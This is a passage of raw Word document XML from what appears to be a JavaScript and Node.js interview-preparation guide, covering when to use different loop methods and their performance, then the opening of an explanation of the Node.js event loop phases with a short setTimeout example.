        </w:rPr>
        <w:t>Use for</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you need performance or complete control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFE9F55" w14:textId="77777777" w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w:rsidRDefault="005F3DE4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="691"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use forEach</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> for iterating over arrays when return values aren't needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19334F75" w14:textId="77777777" w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w:rsidRDefault="005F3DE4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="691"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use map</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> to transform data into a new array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607C023C" w14:textId="77777777" w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w:rsidRDefault="005F3DE4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="691"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use filter</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> to create a filtered subset of an array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106EA39F" w14:textId="77777777" w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w:rsidRDefault="005F3DE4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="691"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use reduce</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> for accumulating values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F87CCD8" w14:textId="77777777" w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w:rsidRDefault="005F3DE4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="691"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use for...in</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> for iterating over object properties (not arrays).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CA829E" w14:textId="77777777" w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w:rsidRDefault="005F3DE4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="691"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use for...of</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> for iterating over values in iterable objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F019C86" w14:textId="77777777" w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w:rsidRDefault="005F3DE4" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Performance Considerations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDE9235" w14:textId="77777777" w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w:rsidRDefault="005F3DE4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="692"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> loops are often the fastest for arrays.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749BA057" w14:textId="77777777" w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w:rsidRDefault="005F3DE4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="692"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>for...in</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> should be avoided for arrays because of performance and potential issues with inherited properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11632670" w14:textId="77777777" w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w:rsidRDefault="005F3DE4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="692"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>for...of</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> offers simplicity and readability for iterables but may not be the fastest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C661D8" w14:textId="77777777" w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w:rsidRDefault="005F3DE4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="692"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The difference in performance might be negligible for smaller datasets, but using the right loop method for your specific use case will lead to cleaner, more efficient code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6624A266" w14:textId="77777777" w:rsidR="00665E4E" w:rsidRPr="00DA2F32" w:rsidRDefault="00665E4E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EE94016" w14:textId="77777777" w:rsidR="00C34874" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="_Toc178383263"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Event Loop</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402A95C7" w14:textId="739E63A4" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="_Toc178383264"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Can you explain in detail the phases of the Node.js event loop? Describe what happens in each phase.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:p w14:paraId="467FB84F"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The Node.js event loop is a fundamental concept that drives the asynchronous nature of Node.js. It's responsible for handling non-blocking I/O operations, allowing Node.js to perform multiple operations concurrently. Understanding the phases of the event loop can help you grasp how Node.js processes asynchronous tasks efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCE9880"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t>Overview of the Node.js Event Loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBD2C43"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The event loop is a process that continuously monitors the call stack and the event/message queue, executing tasks from the queue in different phases. The event loop has six phases, and each phase has a specific purpose. Between these phases, the event loop checks for pending asynchronous I/O operations and executes them when they’re ready.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5057BDF0"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t>Phases of the Event Loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511E717C" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00490D22" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="693"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Timers Phase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F47EF6" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00490D22" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="693"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Pending Callbacks Phase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B75FD6" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00490D22" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="693"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Idle, Prepare Phase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE45EA0" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00490D22" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="693"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Poll Phase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160ED75A" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00490D22" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="693"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Check Phase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52684626" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00490D22" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="693"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Close Callbacks Phase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05581153"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Let's explore each phase in detail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9D57C0" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00000000" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:pict w14:anchorId="0AAAC3F7">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="153C15E1"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t>1. Timers Phase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2003E6" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00490D22" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69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xml:space="preserve"> This phase executes callbacks scheduled by setTimeout() and setInterval() whose delay has elapsed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10425A03" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00490D22" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="694"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Details:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> When you use setTimeout() or setInterval(), the provided callback is stored in a queue, and when the specified time has passed, the timer callback becomes eligible for execution during this phase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C83D531"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Important Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> The execution time of this phase is not guaranteed to be precise. For example, a setTimeout with a 0 ms delay doesn’t mean it will execute immediately; it depends on the event loop's current workload and timing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4896AA2B"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570B06A4"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javascript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0AA54E"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Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C749878"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setTimeout(() =&gt; console.log('Timer 1'), 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200A2C75"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console.log('Main');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41583788"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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70572AA1"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css</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0B549A"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Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB98A5C"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Main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FDD346"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Timer 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289EF4D4"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Even with 0 delay, setTimeout executes after the current synchronous code completes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75233F08" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00000000" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:pict w14:anchorId="542C976C">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="643603D3"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t>2. Pending Callbacks Phase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073DA17A" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00490D22" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="695"/>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xml:space="preserve"> Executes I/O-related callbacks that were deferred to the next iteration of the event loop, such as errors or certain I/O operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62688768" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00490D22" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="695"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Details:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> This phase handles callbacks from some system operations, e.g., errors from TCP connections. It doesn’t handle file I/O or operations initiated by fs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1F8290"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If you have an I/O operation that was completed in the previous iteration of the event loop but required a callback execution, it would be handled in this phase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E0A9B9" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00000000" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
